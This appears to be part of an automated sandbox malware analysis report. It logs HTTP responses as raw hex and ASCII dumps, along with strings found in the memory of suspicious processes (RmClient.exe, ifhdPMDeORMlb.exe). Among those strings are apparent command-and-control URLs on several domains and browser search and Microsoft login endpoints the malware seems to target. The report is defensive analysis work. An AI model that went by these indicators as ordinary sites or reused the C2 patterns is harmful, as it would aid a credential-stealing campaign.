80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 09 Oct 2024 12:21:15 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 09 Oct 2024 12:21:18 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Wed, 09 Oct 2024 12:21:20 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 09 Oct 2024 12:21:40 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 09 Oct 2024 12:21:43 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 09 Oct 2024 12:21:48 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:21:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 12947Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 46 62 6d 66 fc ed f1 9d 08 4b 3a 8d e7 24 f1 1d 0e 44 cd cd 7d d8 04 55 ed 26 2d 13 68 9e d9 f3 83 39 97 a1 9a 7b 1f e6 19 a4 ea 23 7f 87 a3 b8 8c 0d 99 90 65 63 ca 0c fc a1 45 c3 af 80 df 77 de 77 8c 37 f7 94 8e df 77 0a 9f cd 7b 04 d7 f0 be 53 34 bf ef f4 46 5e d7 1b bc ef 1c f5 2f 8f fa ef 3b 8d 76 03 2e 2d f6 7b 99 8c f1 c3 cc e2 87 e1 61 63 81 86 cf 1f 4a 40 7c 73 df 2a d7 01 34 fc 65 03 33 88 4a 16 6d 15 7e 01 7f 53 89 f7 9d 79 46 b9 0c 44 1e ba 51 1f 4d 71 50 34 51 b4 08 70 5f 2f e5 d2 fb 68 be 9d 81 9e 8c bd b1 d7 6f 5c 5d 9d 1e 74 be 7e 43 7e 4f 50 fe 88 0b 20 f8 64 b9 55 34 06 09 1a 87 86 e4 eb ce c1 9b 28 97 81 b3 b2 c9 db b2 b5 9c 31 4d 54 db b4 e1 74 75 4e 82 26 b4 96 56 2f 8a 3b 3b 59 9a 3c cb 94 b6 bf 83 b1 c6 87 b6 e5 29 be a1 e3 7e 53 c2 9c 7c 8f c0 2d 6f c6 44 0e bf 44 cd d6 d5 a9 01 63 10 e6 9d 55 1a 95 f2 0c d8 9f 70 df a6 6a ff c7 bb 5f fe e1 19 ab d1 37 1e 2d 9a b6 d5 ba 42 29 82 c4 8d bb ba 5a 8f cf 9a 38 c3 51 03 2f c0 55 f5 6f 10 d8 66 b7 dd 6d e3 37 93 33 86 4e f0 d0 26 d7 9f 09 f0 38 b1 2d 3c c0 ad c5 ef e8 64 d3 62 79 b7 75 5a 2e e0 58 fe c1 a5 1d f4 ff 5d 6b b6 68 82 17 23 27 67 23 72 67 f7 81 f6 42 2c 6c b5 f5 a4 f9 Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:21:57 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 12947Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 46 62 6d 66 fc ed f1 9d 08 4b 3a 8d e7 24 f1 1d 0e 44 cd cd 7d d8 04 55 ed 26 2d 13 68 9e d9 f3 83 39 97 a1 9a 7b 1f e6 19 a4 ea 23 7f 87 a3 b8 8c 0d 99 90 65 63 ca 0c fc a1 45 c3 af 80 df 77 de 77 8c 37 f7 94 8e df 77 0a 9f cd 7b 04 d7 f0 be 53 34 bf ef f4 46 5e d7 1b bc ef 1c f5 2f 8f fa ef 3b 8d 76 03 2e 2d f6 7b 99 8c f1 c3 cc e2 87 e1 61 63 81 86 cf 1f 4a 40 7c 73 df 2a d7 01 34 fc 65 03 33 88 4a 16 6d 15 7e 01 7f 53 89 f7 9d 79 46 b9 0c 44 1e ba 51 1f 4d 71 50 34 51 b4 08 70 5f 2f e5 d2 fb 68 be 9d 81 9e 8c bd b1 d7 6f 5c 5d 9d 1e 74 be 7e 43 7e 4f 50 fe 88 0b 20 f8 64 b9 55 34 06 09 1a 87 86 e4 eb ce c1 9b 28 97 81 b3 b2 c9 db b2 b5 9c 31 4d 54 db b4 e1 74 75 4e 82 26 b4 96 56 2f 8a 3b 3b 59 9a 3c cb 94 b6 bf 83 b1 c6 87 b6 e5 29 be a1 e3 7e 53 c2 9c 7c 8f c0 2d 6f c6 44 0e bf 44 cd d6 d5 a9 01 63 10 e6 9d 55 1a 95 f2 0c d8 9f 70 df a6 6a ff c7 bb 5f fe e1 19 ab d1 37 1e 2d 9a b6 d5 ba 42 29 82 c4 8d bb ba 5a 8f cf 9a 38 c3 51 03 2f c0 55 f5 6f 10 d8 66 b7 dd 6d e3 37 93 33 86 4e f0 d0 26 d7 9f 09 f0 38 b1 2d 3c c0 ad c5 ef e8 64 d3 62 79 b7 75 5a 2e e0 58 fe c1 a5 1d f4 ff 5d 6b b6 68 82 17 23 27 67 23 72 67 f7 81 f6 42 2c 6c b5 f5 a4 f9 Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:21:59 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 12947Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd b2 eb 72 e3 c6 92 2d fc db 7a 8a 6a 76 d8 22 6d 16 78 a7 24 48 94 67 b6 2f e7 78 62 7b db e1 b6 67 62 c2 ed e8 28 02 09 a0 5a 85 2a ec aa 02 29 36 47 bf ce 53 9c 5f e7 15 bf 47 f8 b2 00 90 a2 28 50 54 eb ba db 16 01 54 65 ae 5c b9 d6 3a 7b f3 fd 2f df fd fe df bf fe 40 12 9b 8a f3 83 33 f7 20 82 c9 78 d2 00 49 ff 78 d7 70 67 c0 c2 f3 83 2f ce 52 b0 8c 04 09 d3 06 ec a4 f1 c7 ef 3f d2 e3 06 e9 ac 6f 24 4b 61 d2 98 71 98 67 4a db 06 09 94 b4 20 b1 72 ce 43 9b 4c 42 98 f1 00 68 f1 d1 26 5c 72 cb 99 a0 26 60 02 26 bd 02 67 03 e6 50 ab a9 b2 e6 70 0d 72 98 b2 4b ca 53 16 03 cd 34 b8 21 be 60 3a 86 c3 a2 d1 72 2b e0 fc 57 bc 25 52 59 12 a9 5c 86 e4 ab b7 c7 fd 5e ef 94 fc 4d 09 fc 60 69 76 4a 7e d5 60 ed 82 fc c2 0c 37 67 9d b2 eb e0 4c 70 79 41 34 88 c9 61 28 8d 83 8f c0 06 c9 21 49 f0 6d 72 d8 e9 a4 2a 4d 17 a9 0a c1 33 dc 56 13 d7 3d 0d 26 2c 68 c9 2c 34 88 5d 64 a8 00 cb 32 c1 03 66 b9 92 1d 6d cc 37 97 a9 c0 2b 37 6b d2 d8 c1 85 7c a5 d9 3f 73 75 4a 7e 04 08 1b e5 e0 46 62 6d 66 fc ed f1 9d 08 4b 3a 8d e7 24 f1 1d 0e 44 cd cd 7d d8 04 55 ed 26 2d 13 68 9e d9 f3 83 39 97 a1 9a 7b 1f e6 19 a4 ea 23 7f 87 a3 b8 8c 0d 99 90 65 63 ca 0c fc a1 45 c3 af 80 df 77 de 77 8c 37 f7 94 8e df 77 0a 9f cd 7b 04 d7 f0 be 53 34 bf ef f4 46 5e d7 1b bc ef 1c f5 2f 8f fa ef 3b 8d 76 03 2e 2d f6 7b 99 8c f1 c3 cc e2 87 e1 61 63 81 86 cf 1f 4a 40 7c 73 df 2a d7 01 34 fc 65 03 33 88 4a 16 6d 15 7e 01 7f 53 89 f7 9d 79 46 b9 0c 44 1e ba 51 1f 4d 71 50 34 51 b4 08 70 5f 2f e5 d2 fb 68 be 9d 81 9e 8c bd b1 d7 6f 5c 5d 9d 1e 74 be 7e 43 7e 4f 50 fe 88 0b 20 f8 64 b9 55 34 06 09 1a 87 86 e4 eb ce c1 9b 28 97 81 b3 b2 c9 db b2 b5 9c 31 4d 54 db b4 e1 74 75 4e 82 26 b4 96 56 2f 8a 3b 3b 59 9a 3c cb 94 b6 bf 83 b1 c6 87 b6 e5 29 be a1 e3 7e 53 c2 9c 7c 8f c0 2d 6f c6 44 0e bf 44 cd d6 d5 a9 01 63 10 e6 9d 55 1a 95 f2 0c d8 9f 70 df a6 6a ff c7 bb 5f fe e1 19 ab d1 37 1e 2d 9a b6 d5 ba 42 29 82 c4 8d bb ba 5a 8f cf 9a 38 c3 51 03 2f c0 55 f5 6f 10 d8 66 b7 dd 6d e3 37 93 33 86 4e f0 d0 26 d7 9f 09 f0 38 b1 2d 3c c0 ad c5 ef e8 64 d3 62 79 b7 75 5a 2e e0 58 fe c1 a5 1d f4 ff 5d 6b b6 68 82 17 23 27 67 23 72 67 f7 81 f6 42 2c 6c b5 f5 a4 f9 Data Ascii: r-zjv"mx$Hg/xb{gb(Z*)6GS_G(PTTe\:{/@3 xIxpg/R?o$KaqgJ rCLBh&\r&`&gPprKS4!`:r+W%RY\^M`ivJ~`7gLpyA4a(!Imr*M3V
            Source: RmClient.exe, 00000006.00000002.4131092895.0000000004CDC000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.00000000042AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mommymode.site/hya5/?rf-LZ=JlCtuN3HqPO8C&AHkx=kBImd3s/QyLjHyq7crISF49n
            Source: RmClient.exe, 00000006.00000002.4131092895.00000000041DE000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.00000000037AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nakama2-sshl.xyz/ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd
            Source: RmClient.exe, 00000006.00000002.4131092895.0000000003A04000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003C114000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLM
            Source: ifhdPMDeORMlb.exe, 00000007.00000002.4132186238.0000000005091000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info
            Source: ifhdPMDeORMlb.exe, 00000007.00000002.4132186238.0000000005091000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info/nuqv/
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RmClient.exe, 00000006.00000002.4131092895.0000000003D28000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.00000000032F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RmClient.exe, 00000006.00000003.2148482181.0000000007869000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
